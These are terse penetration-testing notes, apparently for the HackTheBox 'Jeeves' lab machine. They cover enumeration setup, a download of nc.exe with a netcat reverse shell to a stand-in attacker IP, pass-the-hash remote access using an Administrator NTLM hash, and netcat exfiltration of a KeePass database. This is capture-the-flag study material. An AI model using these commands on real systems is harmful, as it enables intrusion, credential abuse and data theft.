Enum scripts link github.com/C0deDefense/enum_scripts =============================================================== Steps Pre-reqs First install rustscan gokulelango.medium.com/how-install-rustscan-in-kalilinux-5da3663d33b7 next chmod +x nameofscript run it and provide the RHOST IP and if asked the port ==================================================================== Transfer NC wget yourattackboxip:8000/nc.exe -outfile nc.exe && . c.exe -e cmd.exe yourattackboxip 1234 powershell wget "yourattackboxip:8000/nc.exe" -outfile "nc.exe" aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 Download keepass link ============================================== keepass.info/download.html get remote access =========================================================== pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd run directly from your attackbox ============================================================ nc -lp 1235>Jeeves.kdbx ============================================================ run from the RHOST CLI . c.exe -w 3 yourattackboxip 1235